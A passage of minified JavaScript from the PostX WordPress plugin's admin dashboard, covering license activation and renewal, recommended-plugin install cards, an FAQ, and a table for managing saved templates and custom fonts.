Here…","ultimate-post"),value:t||"",onChange:e=>n(e.target.value)}),(0,a.createElement)("div",{className:"ultp-license__helper-text"},__("If you’re unable to activate your product license, please contact the","ultimate-post")," ",(0,a.createElement)("a",{href:"https://www.wpxpo.com/contact/",target:"_blank",className:"ultp-license__link",rel:"noreferrer"},__("support team","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-activate-btn ultp_license_action_btn",onClick:()=>h(),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&h()}},(0,a.createElement)("div",null,__("Activate License","ultimate-post")),p&&(0,a.createElement)("span",{className:"ultp-activate-loading"})),d&&(0,a.createElement)("div",{className:"ultp-license__helper-text"},__("Please make sure your free and pro plugins are updated to the latest release or version. Otherwise, contact the","ultimate-post"),(0,a.createElement)("a",{href:"https://www.wpxpo.com/contact/",target:"_blank",className:"ultp-license__link",rel:"noreferrer"},__("support team","ultimate-post")))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)(l,{title:__("Congratulations on unlocking PostX Pro!","ultimate-post"),message:__("Ignite your imagination and design your ideal experience. Let PostX take care of you and your users.","ultimate-post")}),(0,a.createElement)(s,{licenseData:o,setLicenseData:i,setToastMessages:f}))))},l=({title:e,message:t})=>(0,a.createElement)("div",{className:"ultp-license-message"},(0,a.createElement)("div",{className:"ultp-license-message__icon"},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",width:"48px",height:"46px",viewBox:"0 0 48 48"},(0,a.createElement)("g",{fill:"currentColor"},(0,a.createElement)("path",{d:"M46.15 26.76a.94.94 0 0 0-.39-1.27 14.7 14.7 0 0 0-16.21 1.62l-1.52-1.52 2.48-2.47a.94.94 0 0 0-1.33-1.33l-2.47 2.48-6.04-6.04a13.1 13.1 0 0 0 1.07-13.98.94.94 0 0 0-1.66.88c2.02 3.8 1.7 8.3-.75 11.76l-3.98-3.98a2.3 2.3 0 0 0-3.79.84L.14 44.9c-.3.86-.1 1.78.54 2.42a2.28 2.28 0 0 0 2.42.54l31.15-11.42a2.3 2.3 0 0 0 .84-3.8l-4.2-4.2a12.83 12.83 0 0 1 13.99-1.3.94.94 0 0 0 1.27-.38ZM14.93 41.52l-8.45-8.45 2.34-6.4 12.5 12.5-6.39 2.35Zm-4.58 1.68L4.8 37.65 5.77 35l7.22 7.22-2.64.97Zm-7.9 2.9A.4.4 0 0 1 2 46a.4.4 0 0 1-.1-.45l2.19-5.96 4.32 4.32-5.96 2.19Zm31.43-11.73a.41.41 0 0 1-.27.3l-5.77 2.12-5.33-5.33a.94.94 0 0 0-1.33 1.32l4.72 4.72-2.64.97L9.53 24.74l.97-2.64 4.72 4.72a.93.93 0 0 0 1.32 0 .94.94 0 0 0 0-1.33l-5.33-5.33 2.11-5.77c.07-.19.23-.25.31-.27h.1c.09 0 .2.02.3.12l19.73 19.73c.14.15.13.31.12.4ZM28.27 7.48c.52 0 .94-.42.94-.94 0-.78.64-1.42 1.43-1.42a3.3 3.3 0 0 0 3.3-3.3.94.94 0 0 0-1.88 0c0 .79-.64 1.43-1.42 1.43a3.3 3.3 0 0 0-3.3 3.3c0 .51.42.93.93.93ZM36.6 16.33c1.87 0 3.4-1.53 3.4-3.4 0-.85.69-1.54 1.53-1.54a.94.94 0 0 0 0-1.87 3.41 3.41 0 0 0-3.4 3.4c0 .85-.7 1.54-1.54 1.54a.94.94 0 0 0 0 1.87ZM42 18.14a3 3 0 1 0 6 0 3 3 0 0 0-6 0ZM45 17a1.13 1.13 0 1 1 0 2.26A1.13 1.13 0 0 1 45 17Z"}),(0,a.createElement)("path",{d:"M29.54 15.92a3 3 0 1 0 0-6 3 3 0 0 0 0 6Zm0-4.12a1.13 1.13 0 1 1 0 2.25 1.13 1.13 0 0 1 0-2.25ZM12 6a3 3 0 1 0 0-6 3 3 0 0 0 0 6Zm0-4.13a1.13 1.13 0 1 1 0 2.26 1.13 1.13 0 0 1 0-2.25ZM42.42 32.91a.94.94 0 0 0-1.32 1.33l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89ZM46.84 37.33a.94.94 0 0 0-1.32 1.33l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.33l-.89-.88ZM46.4 32.91l-.88.89a.94.94 0 0 0 1.32 1.32l.89-.88a.94.94 0 0 0-1.33-1.33ZM41.98 37.33l-.88.88a.94.94 0 0 0 1.32 1.33l.89-.88a.94.94 0 0 0-1.33-1.33ZM46.18 2.76c.24 0 .48-.1.66-.28l.89-.88A.94.94 0 1 0 46.4.27l-.88.89a.94.94 0 0 0 .66 1.6ZM41.76 7.18c.24 0 .48-.1.66-.28l.89-.88a.94.94 0 0 0-1.33-1.33l-.88.89a.94.94 0 0 0 .66 1.6ZM46.84 4.7a.94.94 0 0 0-1.32 1.32l.88.88a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89ZM41.98 2.48a.93.93 0 0 0 1.33 0 .94.94 0 0 0 0-1.32l-.89-.89A.94.94 0 0 0 41.1 1.6l.88.88ZM18.86 28.2a.94.94 0 0 0-.93.94.94.94 0 0 0 .93.93.94.94 0 0 0 .94-.93.94.94 0 0 0-.94-.94ZM32.54 18.43l-.68.68a.94.94 0 0 0 1.33 1.33l.68-.68a.94.94 0 0 0-1.33-1.33Z"})))),(0,a.createElement)("div",{className:"ultp-license-message__content"},(0,a.createElement)("div",{className:"ultp-license-message__title ultp-license-message-congrats"},e),(0,a.createElement)("div",{className:"ultp-license-message__text"},t))),s=({licenseData:e,setLicenseData:t,setToastMessages:n})=>{const[r,o]=(0,a.useState)(!1),i=async()=>{try{o(!0);const e=await l();t(e.license_data),n({status:"success",messages:[e?.data||"Some issues occured"],state:!0}),o(!1)}catch(e){n({status:"error",messages:[e.message||"Some issues occured"],state:!0}),o(!1)}},l=async()=>{const e=`${ultp_dashboard_pannel.ajax}`,t=new URLSearchParams({action:"edd_ultp_deactivate_license",security:ultp_dashboard_pannel.nonce,deactivate:"yes"}),n=await fetch(e,{method:"POST",body:t,headers:{"Content-Type":"application/x-www-form-urlencoded"}});if(!n.ok)throw new Error(`HTTP error! Status: ${n.status}`);const a=await n.json();if(a.status)return a};return(0,a.createElement)("div",{className:"ultp-license__status"},(0,a.createElement)("div",{className:"ultp-license__status-messages"},(0,a.createElement)("div",{className:"ultp-license__status-message"},(0,a.createElement)("div",{className:"ultp-license__status-message-label"},__("License Type","ultimate-post")),(0,a.createElement)("div",{className:"ultp-license__status-message-value"},e.licenseType)),(0,a.createElement)("div",{className:"ultp-license__status-message"},(0,a.createElement)("div",{className:"ultp-license__status-message-label"},__("Expire On","ultimate-post")),(0,a.createElement)("div",{className:"ultp-license__status-message-value"},e.expiresAt),(e?.toExpired||"expired"===e.license)&&(0,a.createElement)("a",{href:`https://account.wpxpo.com/checkout/?edd_license_key=${ultp_dashboard_pannel.license}&download_id=${e.itemId}&renew=1`,target:"_blank",rel:"noreferrer",className:"ultp-license__renew-link"},(0,a.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M2.86 6.553a.5.5 0 01.823-.482l3.02 2.745c.196.178.506.13.64-.098L9.64 4.779a.417.417 0 01.72 0l2.297 3.939a.417.417 0 00.64.098l3.02-2.745a.5.5 0 01.823.482l-1.99 8.63a.833.833 0 01-.813.646H5.663a.833.833 0 01-.812-.646L2.86 6.553z",stroke:"currentColor",strokeWidth:"1.5"})),__("Renew License","ultimate-post"))),(0,a.createElement)(p,{licenseData:e})),(0,a.createElement)("div",{className:"ultp-activate-btn ultp_license_action_btn",onClick:()=>i(),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&i()}},(0,a.createElement)("div",null,__("Deactivate License","ultimate-post")),r&&(0,a.createElement)("span",{className:"ultp-activate-loading"})))},p=({licenseData:e})=>{const[t,n]=(0,a.useState)(""),r={1:__("5 Sites - Yearly","ultimate-post"),2:__("Unlimited Sites - Yearly","ultimate-post"),3:__("1 Site - Lifetime","ultimate-post"),4:__("5 Sites - Lifetime","ultimate-post"),5:__("Unlimited Sites - Lifetime","ultimate-post")},o={1:[1,2,3,4,5],7:[2,3,4,5],2:[4,5],4:[2,4,5],5:[5]}[e?.priceId];return o&&0!==o.length?(0,a.createElement)("div",{className:"ultp-license__upgrade-message"},(0,a.createElement)("div",{className:"ultp-license__upgrade-message-title"},(0,a.createElement)("label",{htmlFor:"ultp-license-select"},__("Choose a upgrade plan","ultimate-post")),(0,a.createElement)("select",{id:"ultp-license-select",value:t,onChange:e=>{n(e.target.value)}},o.map((e=>(0,a.createElement)("option",{key:e,value:e},r[e]))))),(0,a.createElement)("a",{className:"ultp-license__upgrade-link",href:`https://account.wpxpo.com/checkout/?edd_action=sl_license_upgrade&license_key=${ultp_dashboard_pannel.license}&upgrade_id=${t||o[0]}`,target:"_blank",rel:"noreferrer"},__("Upgrade Now","ultimate-post"))):null},c=({width:e="100%",height:t="1rem",borderRadius:n="4px",style:r={}})=>(0,a.createElement)("div",{className:"ultp-custom-skeleton-loader",style:{width:e,height:t,borderRadius:n,...r}}),d=[{question:__("Do I need the free version of the plugin on my site?","ultimate-post"),answer:__("Yes. You can use the free version of the plugin, which includes the free features of PostX. However, please note that to use the pro features, you need the free version of the plugin installed on your WordPress site.","ultimate-post")},{question:__("Where do I get my product license?","ultimate-post"),answer:__("You can copy the product license from the client dashboard. Once you copy it, paste the license key into the PostX License validation page.","ultimate-post")},{question:__("How do I get help to use PostX Pro?","ultimate-post"),hasMarkup:!0,answer:__("Please go to the support link: <a href='https://www.wpxpo.com/contact/.' target='_blank'>www.wpxpo.com/contact</a>","ultimate-post")}],u=()=>(0,a.createElement)("div",{className:"ultp-license__faq"},d.map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-license-faq__item"},(0,a.createElement)("div",{className:"ultp-license-faq__question"},e.question),e.hasMarkup?(0,a.createElement)("div",{className:"ultp-license-faq__answer",dangerouslySetInnerHTML:{__html:e.answer}}):(0,a.createElement)("div",{className:"ultp-license-faq__answer"},e.answer)))),(0,a.createElement)("div",{className:"ultp-license-faq-item"},__("PostX is a product of WPXPO. The contact support team is ready to help you with any queries, including how to use the pro version of PostX.","ultimate-post")))},3701:(e,t,n)=>{"use strict";n.d(t,{I:()=>l});var a=n(7294),r=n(1383);n(7376);const{__}=wp.i18n,o={wholesale_x:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#FEAD01",d:"M22.288 5.44498 11.1095 7.77499c-.6634.13829-1.0892.78825-.9509 1.45173l2.33 11.17848c.1383.6635.7883 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7882.9509-1.4517l-2.33-11.1785c-.1383-.66347-.7882-1.08921-1.4517-.95092Zm3.1934 15.32522-11.1785 2.33c-.6635.1383-1.0892.7882-.9509 1.4517l2.33 11.1785c.1383.6635.7882 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7883.9509-1.4517l-2.33-11.1785c-.1383-.6635-.7883-1.0892-1.4517-.9509ZM37.6161 2.25064 26.4377 4.58065c-.6635.1383-1.0893.78826-.951 1.45173l2.33 11.17852c.1383.6634.7883 1.0892 1.4518.9509l11.1784-2.33c.6635-.1383 1.0893-.7883.951-1.4518l-2.33-11.17843c-.1383-.66348-.7883-1.08922-1.4518-.95093Zm3.1934 15.32716-11.1785 2.33c-.6635.1383-1.0892.7883-.9509 1.4517l2.33 11.1785c.1383.6635.7883 1.0892 1.4517.9509l11.1785-2.33c.6635-.1383 1.0892-.7882.9509-1.4517l-2.33-11.1785c-.1383-.6635-.7882-1.0892-1.4517-.9509Z"}),(0,a.createElement)("path",{fill:"#6C6CFF",d:"M11.4509 35.4957c-.2235-.0003-.4402-.0776-.6136-.2187-.1734-.1412-.293-.3377-.3386-.5566L4.40205 5.44687c-.0671-.32174-.25914-.60372-.53395-.784-.27481-.18029-.60992-.24415-.93177-.17757-.15961.03288-.31112.09709-.44576.18889-.13464.09181-.24976.20939-.33867.34596-.08986.13594-.15175.2884-.1821.4485-.03036.16011-.02855.32465.00531.48404l.47956 2.30076c.05267.25283.00277.51622-.13875.73225-.14152.21603-.36305.367-.61587.41971-.12518.0261-.25429.02728-.37992.00348-.12564-.0238-.24534-.07212-.352302-.1422-.106958-.07007-.199074-.16054-.271063-.26622-.071988-.10568-.122425-.22451-.14848-.3497L.0686777 6.35002c-.0868909-.41-.0913681-.83319-.0132214-1.24494.0781467-.41176.2373657-.80387.4684307-1.15352.228483-.35063.524233-.65249.870113-.8881.34589-.23562.73506-.40032 1.145-.48457.8274-.1712 1.68888-.00722 2.39554.45595.70665.46317 1.20075 1.18772 1.3739 2.01471L12.4051 34.3231c.0294.1417.0269.2883-.0074.4289s-.0996.2719-.1909.3842c-.0914.1122-.2067.2028-.3374.2649-.1307.0622-.2737.0944-.4185.0944v.0002Zm8.49 5.5912c-.2408-.0005-.4729-.0901-.6515-.2515-.1786-.1615-.291-.3834-.3156-.623-.0245-.2395.0404-.4796.1825-.674.1421-.1944.3511-.3293.5868-.3786l27.0841-5.6452c.2528-.0527.5162-.0028.7322.1387.216.1415.3669.3631.4196.6159.0527.2528.0028.5162-.1387.7322-.1415.216-.363.3669-.6158.4196l-27.0841 5.6452c-.0656.0136-.1325.0205-.1995.0207Z"}),(0,a.createElement)("path",{fill:"#070C1A",d:"M12.8922 45.9671c-.8322-.0016-1.647-.2389-2.3499-.6845-.70286-.4456-1.26512-1.0812-1.62162-1.8332-.35651-.752-.49266-1.5896-.39269-2.4158.09996-.8262.43196-1.6072.95753-2.2525.52558-.6452 1.22318-1.1284 2.01208-1.3935.7889-.2651 1.6367-.3012 2.4453-.1043.8086.197 1.5448.619 2.1234 1.2172.5786.5981.9759 1.348 1.1458 2.1627.2383 1.1434.0126 2.3345-.6273 3.3115-.64.977-1.6418 1.6597-2.7852 1.898-.2984.0625-.6025.0941-.9074.0944Zm.014-6.8621c-.1701 0-.3398.0176-.5062.0525-.4757.099-.9113.3369-1.2518.6835-.3404.3467-.5704.7865-.6609 1.2638-.0905.4774-.0374.9708.1525 1.418.19.4472.5083.828.9147 1.0943.4064.2663.8826.4061 1.3684.4017.4859-.0044.9595-.1527 1.361-.4263.4015-.2735.7129-.66.8948-1.1105.1819-.4505.2261-.9449.127-1.4205-.1152-.5517-.4164-1.047-.8533-1.403-.4368-.3561-.9827-.5512-1.5462-.5528v-.0007Z"})),wow_store:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#FF176B",d:"M33.4798 8.9711 48 0l-7.1908 32.9249-4.4393 5.9884H4.9711L0 32.9249l3.90751-17.9654 8.76299 2.9827-2.6127 11.9769h6.289l3.9307-17.9653h9.4335l-3.9307 17.9653h6.2891l4.578-20.948h-3.1676ZM9.98852 48.0005c1.66478 0 2.98268-1.3411 2.98268-2.9827s-1.3411-2.9826-2.98268-2.9826c-1.64162 0-2.98266 1.341-2.98266 2.9826 0 1.6416 1.34104 2.9827 2.98266 2.9827Zm15.67578 0c1.6416 0 2.9827-1.3411 2.9827-2.9827s-1.3411-2.9826-2.9827-2.9826-2.9827 1.341-2.9827 2.9826c0 1.6416 1.3411 2.9827 2.9827 2.9827Z"})),wow_revenue:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("path",{fill:"#00A464",d:"M47.9999 47.9999H36L24 0h12l11.9999 47.9999Zm-12 0H24L12 15.96h12l11.9999 32.0399Zm-12 .0001H12L0 32.04h12L23.9999 48Z"})),wow_optin:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 48 48"},(0,a.createElement)("g",{fill:"#F97415",clipPath:"url(#optin_48_path)"},(0,a.createElement)("path",{d:"M28.7992 24.0373c0-2.6419-2.1581-4.8-4.8-4.8-2.6418 0-4.8 2.1581-4.8 4.8 0 2.6419 2.1582 4.8 4.8 4.8 2.6419 0 4.8-2.1581 4.8-4.8Z"}),(0,a.createElement)("path",{d:"M24 48.0372v-9.6c7.9256 0 14.4-6.4744 14.4-14.4S31.9256 9.63721 24 9.63721 9.6 16.1116 9.6 24.0372H0C0 10.7907 10.7535 0 24 0s24 10.7535 24 24-10.7535 24-24 24v.0372Z"}),(0,a.createElement)("path",{d:"m19.2 28.8369-19.2 6.4 8.8186 3.9814L12.8 48.0369l6.4372-19.2H19.2Z"})),(0,a.createElement)("defs",null,(0,a.createElement)("clipPath",{id:"optin_48_path"},(0,a.createElement)("path",{fill:"#fff",d:"M0 0h48v48H0z"})))),wow_addon:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"40",height:"40",fill:"none",viewBox:"0 0 32 32"},(0,a.createElement)("rect",{width:"14.12",height:"14.12",x:"1",y:"16.88",fill:"#86A62C",rx:"3.53"}),(0,a.createElement)("rect",{width:"14.12",height:"14.12",x:"16.88",y:"1",fill:"#86A62C",rx:"3.53"}),(0,a.createElement)("path",{fill:"#86A62C",fillRule:"evenodd",d:"M1.38 2.93C1 3.68 1 4.67 1 6.65v2.82c0 1.98 0 2.97.38 3.72.34.66.88 1.2 1.55 1.54.75.39 1.74.39 3.72.39h2.82c1.98 0 2.97 0 3.72-.39.66-.34 1.2-.88 1.54-1.54.39-.75.39-1.74.39-3.72V6.65c0-1.98 0-2.97-.39-3.72a3.53 3.53 0 0 0-1.54-1.55C12.44 1 11.45 1 9.47 1H6.65c-1.98 0-2.97 0-3.72.38-.67.34-1.2.88-1.55 1.55Zm5.98 8.62 5.73-5.73-1.24-1.25-5.11 5.1-2.47-2.46-1.25 1.25 3.1 3.09c.34.34.9.34 1.24 0ZM16.88 22.53c0-1.98 0-2.97.39-3.72.34-.66.88-1.2 1.54-1.54.75-.39 1.74-.39 3.72-.39h2.82c1.98 0 2.97 0 3.72.39.67.34 1.2.88 1.55 1.54.38.75.38 1.74.38 3.72v2.82c0 1.98 0 2.97-.38 3.72-.34.67-.88 1.2-1.55 1.55-.75.38-1.74.38-3.72.38h-2.82c-1.98 0-2.97 0-3.72-.38a3.53 3.53 0 0 1-1.54-1.55c-.39-.75-.39-1.74-.39-3.72v-2.82Zm6.18.53v-3.09h1.76v3.09h3.1v1.76h-3.1v3.1h-1.76v-3.1h-3.09v-1.76h3.09Z",clipRule:"evenodd"}))},i={wholesale_x:{title:"WholesaleX",subtitle:`WholesaleX \n        ${__("is a B2B wholesale plugin featuring advanced wholesale pricing and customization features.","ultimate-post")}`,install:"installation url",pluginUrl:"https://getwholesalex.com/"},wow_store:{title:"WowStore",subtitle:`WowStore ${__("is a complete WooCommerce store builder featuring advanced options to improve sales!","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wpxpo.com/wowstore/"},wow_revenue:{title:"WowRevenue",subtitle:`WowRevenue ${__("boost sales and maximize revenue with the advanced discount campaigns of WowRevenue.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wowrevenue.com/"},wow_optin:{title:"WowOptin",subtitle:`WowOptin ${__("generates actionable leads and boost sales with popups, banners, and floating bars using WowOptin.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wowoptin.com/"},wow_addon:{title:"WowAddons",subtitle:`WowAddons ${__("extends the functionality of your WooCommerce store with additional features and options.","ultimate-post")}`,install:"installation url",pluginUrl:"https://www.wpxpo.com/product-addons-for-woocommerce/"}},l=()=>{const[e,t]=(0,a.useState)({}),[n,l]=(0,a.useState)(ultp_dashboard_pannel.products||{}),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(ultp_dashboard_pannel.products_active||{}),u=e=>{t((t=>({...t,[e]:!0})));const n=new FormData;n.append("action","ultp_install_plugin"),n.append("wpnonce",ultp_dashboard_pannel.security),n.append("plugin",e),fetch(ultp_dashboard_pannel.ajax,{method:"POST",body:n}).then((e=>e.json())).then((()=>{})).catch((()=>{})).finally((()=>{t((t=>({...t,[e]:!1}))),l((t=>({...t,[e]:!0}))),d((t=>({...t,[e]:!0})))}))},m=(0,r.t)();return(0,a.useEffect)((()=>{p(!0),setTimeout((()=>{m.current&&p(!1)}),1e3)}),[]),(0,a.createElement)("div",{className:"ultp-plugins-wrapper"},(0,a.createElement)("div",{className:"ultp-plugin-items"},Object.keys(i).map(((t,r)=>((t,r)=>{const l=o[t]||null;return(0,a.createElement)("div",{key:r,className:"ultp-plugin-item"},(0,a.createElement)("div",{className:"ultp-plugin-item-title"},(0,a.createElement)("div",{className:"ultp-product-icon"},l),i[t].title),(0,a.createElement)("div",{className:"ultp-plugin-item-desc"},i[t].subtitle),(0,a.createElement)("div",{className:"ultp-plugin-item-action"},(0,a.createElement)(a.Fragment,null,c[t]?(0,a.createElement)("div",{className:"ultp-secondary-button ultp-activated-button"},__("Activated","ultimate-post")):(0,a.createElement)("div",{className:"ultp-secondary-button ultp-plugin-active-btn",onClick:()=>u(t),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&u(t)}},(0,a.createElement)("div",null,n[t]?__("Activate","ultimate-post"):__("Install","ultimate-post")),e[t]&&(0,a.createElement)("span",{className:"ultp-plugin-item-loading"}))),(0,a.createElement)("div",{className:"ultp-transparent-alter-button",role:"button",tabIndex:-1,onClick:()=>window.open(i[t].pluginUrl,"_blank"),onKeyDown:e=>{"Enter"===e.key&&window.open(i[t].pluginUrl,"_blank")}},__("Plugin Details","ultimate-post"))))})(t,r)))))}},5957:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(356),o=n(4766),i=n(4482),l=n(8949);n(6680);const{__}=wp.i18n,s=e=>{const[t,n]=(0,a.useState)([]),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(1),[u,m]=(0,a.useState)(0),[f,h]=(0,a.useState)(""),[g,v]=(0,a.useState)(0),[_,w]=(0,a.useState)(!1),[b,x]=(0,a.useState)(""),[y,k]=(0,a.useState)([]),[E,C]=(0,a.useState)(""),[S,M]=(0,a.useState)(!1),[L,N]=(0,a.useState)({state:!1,status:""}),[Z,P]=(0,a.useState)(!1);(0,a.useEffect)((()=>(z(),document.addEventListener("mousedown",B),()=>document.removeEventListener("mousedown",B))),[]);const z=(t={})=>{A({action:"dashborad",data:Object.assign({},{type:"saved_templates",pages:c,pType:e.type},t)})},A=e=>{wp.apiFetch({path:"/ultp/v2/"+e.action,method:"POST",data:e.data}).then((t=>{if(t.success)switch(e.data.type){case"saved_templates":k(Array(t.data.length).fill(!1)),n(t.data),p(!(t.data.length>0)),h(t.new),m(t.found),v(t.pages),x(""),w(!1),e.data.search&&d(1);break;case"status":case"delete":case"duplicate":case"action_draft":case"action_delete":case"action_publish":z(),w(!1),N({status:e.data.type.includes("delete")?"error":"success",messages:[t.message],state:!0})}}))},B=e=>{e.target.parentNode.classList.contains("ultp-reserve-button")||(C(""),M(!1))};return(0,a.createElement)("div",{className:`ultp-${"ultp_templates"==e.type?"saved-template":"custom-font"}-container`},L.state&&(0,a.createElement)(r.Z,{delay:2e3,toastMessages:L,setToastMessages:N}),f?(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type&&!ultp_dashboard_pannel.active&&t?.length>0?(0,a.createElement)("a",{className:"ultp-primary-button cursor",onClick:()=>P(!0)},__("Add New","ultimate-post")):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("a",{className:"ultp-primary-button ",target:"_blank",href:f,rel:"noreferrer"},__("Add New","ultimate-post")))):(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:108,unit1:"px",size2:46,unit2:"px",br:4}}),(0,a.createElement)("div",{className:"tableCon"},(0,a.createElement)("div",{className:"ultp-bulk-con ultp-dash-item-con"},(0,a.createElement)("div",null,(0,a.createElement)("select",{value:b,onChange:e=>x(e.target.value)},(0,a.createElement)("option",{value:""},__("Bulk Action","ultimate-post")),(0,a.createElement)("option",{value:"publish"},__("Publish","ultimate-post")),(0,a.createElement)("option",{value:"draft"},__("Draft","ultimate-post")),(0,a.createElement)("option",{value:"delete"},__("Delete","ultimate-post"))),(0,a.createElement)("a",{className:"ultp-primary-button cursor",onClick:()=>{const e=y.filter((e=>Number.isInteger(e)));b&&e.length>0&&("delete"==b?confirm("Are you sure you want to apply the action?")&&A({action:"dashborad",data:{type:"action_"+b,ids:e}}):A({action:"dashborad",data:{type:"action_"+b,ids:e}}))}},__("Apply","ultimate-post"))),(0,a.createElement)("input",{type:"text",placeholder:"Search...",onChange:e=>{z({search:e.target.value})}})),(0,a.createElement)("div",{className:"ultpTable"},(0,a.createElement)("table",{className:0!=t.length||s?"":"skeletonOverflow"},(0,a.createElement)("thead",null,(0,a.createElement)("tr",null,(0,a.createElement)("th",null,(0,a.createElement)("input",{type:"checkbox",checked:_,onChange:e=>{k(_?Array(t.length).fill(!1):t.map((e=>e.id))),w(!_)}})),(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("th",{className:"title"},__("Title","ultimate-post")),(0,a.createElement)("th",null,__("Shortcode","ultimate-post"))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("th",{className:"title"},__("Font Family","ultimate-post")),(0,a.createElement)("th",{className:"fontpreview"},__("Preview","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("WOFF","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("WOFF2","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("TTF","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("SVG","ultimate-post")),(0,a.createElement)("th",{className:"fontType"},__("EOT","ultimate-post"))),(0,a.createElement)("th",{className:"dateHead"},__("Date","ultimate-post")),(0,a.createElement)("th",null,__("Action","ultimate-post"))))),(0,a.createElement)("tbody",null,t?.map(((t,n)=>(0,a.createElement)("tr",{key:n},(0,a.createElement)("td",null,(0,a.createElement)("input",{type:"checkbox",checked:!!y[n],onChange:()=>{const e=[...y];e.splice(n,1,!y[n]&&t.id),k(e)}})),(t=>{let n="",r={fontFamily:"",fontWeight:""};if("ultp_templates"!=e.type&&t?.font_settings?.length>0){const e=t.font_settings[0],a=[];e.woff&&a.push(`url(${e.woff}) format('woff')`),e.woff2&&a.push(`url(${e.woff2}) format('woff2')`),e.ttf&&a.push(`url(${e.ttf}) format('TrueType')`),e.svg&&a.push(`url(${e.svg}) format('svg')`),e.eot&&a.push(`url(${e.eot}) format('eot')`),n+=` @font-face {\n                font-family: "${t.title}";\n                font-weight: ${e.weight};\n                font-display: auto;\n                src: ${a.join(", ")};\n            } `,r={fontFamily:t.title,fontWeight:e.weight}}return(0,a.createElement)(a.Fragment,null,"ultp_templates"==e.type?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("td",{className:"title"},(0,a.createElement)("a",{href:t?.edit?.replace("&amp;","&"),target:"_blank",rel:"noreferrer"},t.title||"Untitled")),(0,a.createElement)("td",null,(0,a.createElement)("span",{className:"shortCode",onClick:e=>{(e=>{let t=!1;if(navigator.clipboard)t=navigator.clipboard.writeText(e.target.innerHTML);else{const n=document.createElement("input");n.setAttribute("value",e.target.innerHTML),document.body.appendChild(n),n.select(),t=document.execCommand("copy"),document.body.removeChild(n)}if(t){const t=document.createElement("span");t.innerText="Copied!",e.target.appendChild(t),setTimeout((()=>{e.target.removeChild(t)}),800)}})(e)}},'[postx_template id="',t.id,'"]'))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("td",{className:"title"},(0,a.createElement)("a",{href:t?.edit?.replace("&amp;","&"),target:"_blank",rel:"noreferrer"},t.title||"Untitled")),t.title&&(0,a.createElement)("style",{type:"text/css"},n),(0,a.createElement)("td",{style:r},__("The quick brown fox jumps over the lazy dog.","ultimate-post")),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.woff?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.woff2?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.ttf?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.svg?"dashicons-yes":"dashicons-no-alt")})),(0,a.createElement)("td",{className:"fontType"},(0,a.createElement)("span",{className:"dashicons "+(t.eot?"dashicons-yes":"dashicons-no-alt")}))))})(t),(0,a.createElement)("td",{className:"typeDate"},"publish"==t.status?"Published":t.status," ",(0,a.createElement)("br",null),t.date),(0,a.createElement)("td",null,(0,a.createElement)("span",{className:"actions ultp-reserve-button",onClick:e=>{M(!S),C(t.id)}},(0,a.createElement)("span",{className:"dashicons dashicons-ellipsis"}),E==t.id&&S&&(0,a.createElement)("ul",{className:"ultp-dash-item-con actionPopUp ultp-reserve-button"},(0,a.createElement)("li",{className:"ultp-reserve-button"},(0,a.createElement)("a",{target:"_blank",href:t?.edit?.replace("&amp;","&"),rel:"noreferrer"},(0,a.createElement)("span",{className:"dashicons dashicons-edit-large"}),__("Edit","ultimate-post"))),(0,a.createElement)("li",{onClick:e=>{C(""),M(!1),e.preventDefault(),confirm("Are you sure?")&&A({action:"template_action",data:{type:"status",id:t.id,status:"publish"==t.status?"draft":"publish"}})}},(0,a.createElement)("span",{className:"dashicons dashicons-open-folder"}),__("Set to","ultimate-post")," 